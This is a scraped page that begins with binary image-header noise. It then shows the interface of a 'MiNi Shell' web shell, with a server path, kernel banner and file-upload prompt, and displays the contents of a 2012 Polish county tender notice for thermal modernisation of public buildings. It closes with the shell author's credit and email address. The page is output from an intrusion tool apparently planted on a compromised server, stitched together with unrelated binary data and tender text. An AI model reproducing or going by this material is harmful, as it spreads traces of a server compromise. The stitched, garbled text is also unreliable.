JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120517/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120517/159246-N-2012.html

<p class="kh_header"><b>Pleszew: Termomodernizacja obiektów użyteczności publicznej Powiatu Pleszewskiego w miejscowościach Pleszew oraz Marszew.</b><br>
<b>Numer ogłoszenia: 159246 - 2012; data zamieszczenia: 17.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Powiatu w Pleszewie , ul. Poznańska 79, 63-300 Pleszew, tel. 062 7429652, faks 062 7429665.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pleszew.starostwo.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Termomodernizacja obiektów użyteczności publicznej Powiatu Pleszewskiego w miejscowościach Pleszew oraz Marszew..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. Przedmiotem zamówienia jest termomodernizacja obiektów użyteczności publicznej Powiatu Pleszewskiego w miejscowościach Pleszew oraz Marszew w części obejmującej następujące zadania:
1.Zadanie nr 1-Termomodernizacja budynku D Starostwa Powiatowego w Pleszewie.
Zakres prac obejmuje:
a). modernizacja instalacji c.o: -wymiana istniejącej starej instalacji na nową,
- wymiana istniejących grzejników żeliwnych na grzejniki stalowe płytowe.
b). Termomodernizacja dachu:-rozbiórka istniejącego pokrycia z papy oraz warstw podkładowych stropodachu pełnego, - docieplenie dachu płytą warstwową o grubości średnio 20 cm, płyta styropianowa EPS 100 obustronnie laminowana papą w ilości 82,87 m2,- wykonanie nowego dwuwarstwowego pokrycia dachu z papy termozgrzewalnej na osnowie poliestrowej, wierzchnia warstwa o gramaturze min. 250 g/m2 i gr. 5,2 mm w ilości 82,87 m2, -wymiana rynien i rur spustowych z blachy ocynkowanej na nowe z PCV.
c). Termomodernizacja ścian zewnętrznych:- płyty styropianowe EPS 70 w metodzie bezspoinowej z wykonaniem tynku krzemianowego malowanego farbami silikatowymi w ilości 243,60 m2,-wymiana parapetów zewnętrznych lastrikowych na nowe z blachy powlekanej.
d) wymiana okien metalowych na nowe z PCV uchylne, w ilości 1,65 m2 (łącznie 3 szt.)
e) wykonanie zewnętrznej opaski budynku z kostki betonowej wraz z obrzeżem - w ilości 16,00 m2,
f) demontaż starych metalowych balustrad schodów zewnętrznych, drabin oraz montaż nowych elementów.
2.Zadanie nr 2-Termomodernizacja budynku Powiatowego Urzędu Pracy w Pleszewie.
Zakres prac obejmuje:
a). modernizacja instalacji c.o.: - wymiana istniejących kotłów olejowych na nowe kotły gazowe wraz z automatyką i osprzętem - 2 szt.- wykonanie wewnętrznej instalacji gazowej kotłowni,- płukanie chemiczne instalacji,- demontaż zaworów zamontowanych na gałązkach zasilających,- montaż zaworów termostatycznych przy grzejnikach, - regulacja hydrauliczna kotłowni, - montaż zestawu kolektorów słonecznych (6 m2) wraz z instalacją całego osprzętu technicznego i podłączeniem do instalacji c.w.u. 
b). Termomodernizacja dachu:
- docieplenie dachu płytą warstwową o grubości 15 cm, płyta styropianowa EPS 100 obustronnie laminowana papą w ilości 415,68 m2,- wykonanie nowego jednowarstwowego pokrycia dachu z papy termozgrzewalnej na osnowie poliestrowej o gramaturze min. 250 g/m2 i gr. 5,7 mm w ilości 438,60 m2, - wymiana rynien i rur spustowych z blachy ocynkowanej na nowe z PCV.
c). Termomodernizacja ścian zewnętrznych:- płyty styropianowe EPS 70 w metodzie bezspoinowej z wykonaniem tynku mineralnego w ilości 
610,64 m2,- malowanie farbami silikatowymi tynków w kolorach określonych w dokumentacji technicznej w ilości 714,53 m2,- wymiana parapetów zewnętrznych i opierzeń na nowe z blachy powlekanej,
d). demontaż starej i wykonanie nowej instalacji odgromowej budynku,
e). wymiana okien metalowych na nowe z PCV uchylno-rozwieralne w ilości 0,90 m2 (1 szt.)
3.Zadanie nr 3-Termomodernizacja budynku Zarządu Dróg Powiatowych w Pleszewie.
Zakres prac obejmuje:
a). modernizacja instalacji c.o:- montaż nowych rurociągów,- montaż nowego kotła stalowego wodnego z podajnikiem ślimakowym na eko-groszek o mocy 16 kW,
- grzejniki z zasilaniem dolnym typu CV,- otuliny termoizolacyjne rurociągów, 
b). Termomodernizacja dachu:
- rozbiórka i wymurowanie kanałów dymowych i wentylacyjnych wychodzących ponad połać dachu,- rozebranie istniejącego pokrycia wraz z obróbkami blacharskimi. Wykonanie pełnego deskowania dachu wraz z izolacją papy. Pokrycie dachu wykonać z nowej dachówki karpiówki wraz z nowymi obróbkami blacharskimi. Ocieplenie z wełny mineralnej gr. 20 cm.
c). Termomodernizacja ścian zewnętrznych:
- płyty styropianowe EPS 70 o gr. 14 cm w metodzie bezspoinowej z wykonaniem tynku mineralnego, malowanego farbami egalizacyjnymi, w ilości 205,41 m2,
- montaż rur spustowych oraz parapetów zewnętrznych z blachy cynkowo-tytanowej.
d). Roboty pozostałe:
- montaż zadaszenia nad wejściem do budynku z płyty poliwęglanowej,
- montaż nowej balustrady przy schodach zewnętrznych budynku,
4.Zadanie nr 4-Termomodernizacja budynku A Zespołu Szkół Przyrodniczo - Politechnicznych Centrum Kształcenia Ustawicznego w Marszewie.
Zakres prac obejmuje:
a). Termomodernizacja dachu:- docieplenie dachu płytą warstwową, płyta styropianowa EPS 100 obustronnie laminowana papą w ilości 942,84 m2,
- wykonanie nowego dwuwarstwowego pokrycia dachu z papy termozgrzewalnej na osnowie poliestrowej o gramaturze: min. 200 g/m2 i gr. 4 mm dla papy podkładowej oraz min. 250 g/m2 i gr. 5,2 mm dla papy wierzchniego krycia w ilości 942,84 m2, 
- demontaż oraz ponowny montaż rynien i rur spustowych nadających się do użycia,- wykonanie nowych obróbek blacharskich murów ogniowych, gzymsów, kominów z blachy stalowej powlekanej w ilości 108,99 m2,
- wymiana naświetla dachowego z płyty poliwęglanowej trzykomorowej.
b). Termomodernizacja ścian zewnętrznych:
- płyty styropianowe EPS 70 w metodzie bezspoinowej z wykonaniem tynku mineralnego, pomalowanego farbami egalizacyjnymi w ilości 1434,31 m2,
- montaż parapetów zewnętrznych prefabrykowanych z blachy stalowej powlekanej.
c). Pozostałe roboty:
- wykonanie numeracji budynku według zaleceń dyrekcji szkoły,- wykonanie okładziny zewnętrznej z płytek ceramicznych przy wejściu do budynku w ilości 10,68 m2.
II. Szczegółowy opis przedmiotu zamówienia dla poszczególnych zadań zawarto w projektach technicznych, przedmiarach robót, kosztorysach ślepych oraz w specyfikacjach technicznych wykonania i odbioru robót budowlanych, stanowiących załączniki do Specyfikacji Istotnych Warunków Zamówienia.
III. Zamawiający dopuszcza składanie ofert częściowych. Jeden wykonawca może złożyć ofertę na dowolną liczbę  zadań..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.32.00.00-6, 45.40.00.00-1, 45.41.00.00-4, 45.42.10.00-4, 45.26.10.00-4, 45.26.25.00-6, 45.44.21.00-8, 45.30.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium w wysokości :
1. Dla zadania nr 1:  3. 000,00 zł (słownie: trzy  tysiące  złotych).
2. Dla zadanie nr 2: 8.000,00 zł (słownie: osiem  tysięcy złotych).
3. Dla zadanie nr 3: 3.000,00 zł (słownie: trzy  tysiące złotych).
4. Dla zadanie nr 4:  14. 000,00 (słownie: czternaście tysięcy złotych).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.Dla zadanie nr 1 - w zakresie wiedzy i doświadczenia wykonawca musi wykazać się realizacją w ciągu  ostatnich 5 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności  jest krótszy w tym okresie) co najmniej 1 robotą  termomodernizacyjną budynku o wartości minimum  80.000,00 zł brutto oraz  1 robotą budowlaną polegającą na wymianie, modernizacji bądź instalacji systemów centralnego ogrzewania w budynku,  o wartości min. 40.000,00 zł brutto. 
2.Dla  zadanie nr 2 - w zakresie wiedzy i doświadczenia wykonawca musi wykazać się realizacją w ciągu  ostatnich 5 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności, jest krótszy w tym okresie), co najmniej 2 robotami  termomodernizacyjnymi  budynków o wartości 
minimim 150.000,00 zł brutto każda, oraz 2 robotami budowlanymi  polegającymi na wymianie, 
modernizacji bądź instalacji systemów centralnego ogrzewania w budynkach, o wartości min. 30.000,00 zł brutto każda.
3.Dla zadania nr 3 - w zakresie wiedzy i doświadczenia wykonawca musi wykazać się realizacją w ciągu  ostatnich 5 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności  jest krótszy w tym okresie), co najmniej 1 robotą termomodernizacyjną budynku o wartości min. 80.000,00 zł brutto oraz 1 robotą budowlaną polegającą na wymianie, modernizacji bądź instalacji systemów centralnego ogrzewania w budynku, o wartości min. 40.000,00 zł brutto.
4. Dla  zadania nr 4 - w zakresie wiedzy i doświadczenia wykonawca musi wykazać się realizacją w ciągu  ostatnich 5 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności  jest krótszy w tym okresie), co najmniej 2 robotami  termomodernizacyjnymi  budynków o wartości minimum 200.000,00 zł brutto każda.
Zamawiający przez roboty termomodernizacyjne rozumie roboty budowlane polegające na dociepleniu ścian, dachów lub stropodachów budynków. 
Zamawiający dokona oceny spełnienia ww. warunku na podstawie dokumentów załączonych do oferty.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie osób zdolnych do wykonania zamówienia, wykonawca musi wykazać się dysponowaniem:
minimum po 1 osobie pełniącej funkcję kierownika robót, posiadającej uprawnienia budowlane, o których mowa w ustawie z dnia 7 lipca 1994 r. Prawo budowlane 
( Dz.U. z 2006 r. nr 156, poz.1118 ze zm. ) do kierowania robotami budowlanymi w następujących specjalnościach: 
- konstrukcyjno-budowlanej - dla zadania nr 1,2,3 i 4 oraz
- instalacyjnej  w zakresie sieci, instalacji i urządzeń cieplnych i gazowych - dla zadania nr 1, 2 i 3. 
Zamawiający dokona oceny spełnienia ww. warunku na podstawie dokumentów załączonych do oferty.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi posiadać ubezpieczenie od odpowiedzialności cywilnej w zakresie  prowadzonej działalności na sumę ubezpieczenia co najmniej 500.000,00 zł.
Zamawiający dokona oceny spełnienia ww. warunku na podstawie dokumentów załączonych do oferty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. kosztorys ofertowy - zgodnie z załączonym kosztorysem ślepym,
2. dokumenty potwierdzające równoważność oferowanych materiałów i urządzeń w przypadku składania ofert równoważnych.
3. dowód wniesienia wadium w formie pieniężnej lub w innej formie - zgodnie z pkt. XV SIWZ.
4. pełnomocnictwo do reprezentacji - jeżeli dotyczy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian postanowień umowy w następujących okolicznościach:
1). zmiany terminów wykonania zadania, wynikających z:
a) przestojów i opóźnień zawinionych przez Zamawiającego oraz zawieszenia robót przez Zamawiającego,
b) działania siły wyższej (np. klęski żywiołowe), mającego bezpośredni wpływ na terminowość wykonania robót,
c) wystąpienia warunków atmosferycznych uniemożliwiających wykonywanie robót,  przeprowadzanie prób i sprawdzeń - fakt ten musi mieć odzwierciedlenie w dzienniku budowy i musi być potwierdzony przez inspektora nadzoru,
2). niezależnych od stron umowy zmian dotyczących osób kluczowych dla realizacji umowy (choroba, wypadki losowe, nieprzewidziane zmiany organizacyjne).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pleszew.starostwo.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Pleszewie, ul. Poznańska 79, 63 - 300 Pleszew
pokój nr 212.
Cena:300,00 zł.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.06.2012 godzina 10:00, miejsce: Starostwo Powiatowe w Pleszewie, ul. Poznańska 79, 63 - 300 Pleszew, pokój 104 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Narodowego Funduszu Ochrony Środowiska i Gospodarki Wodnej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com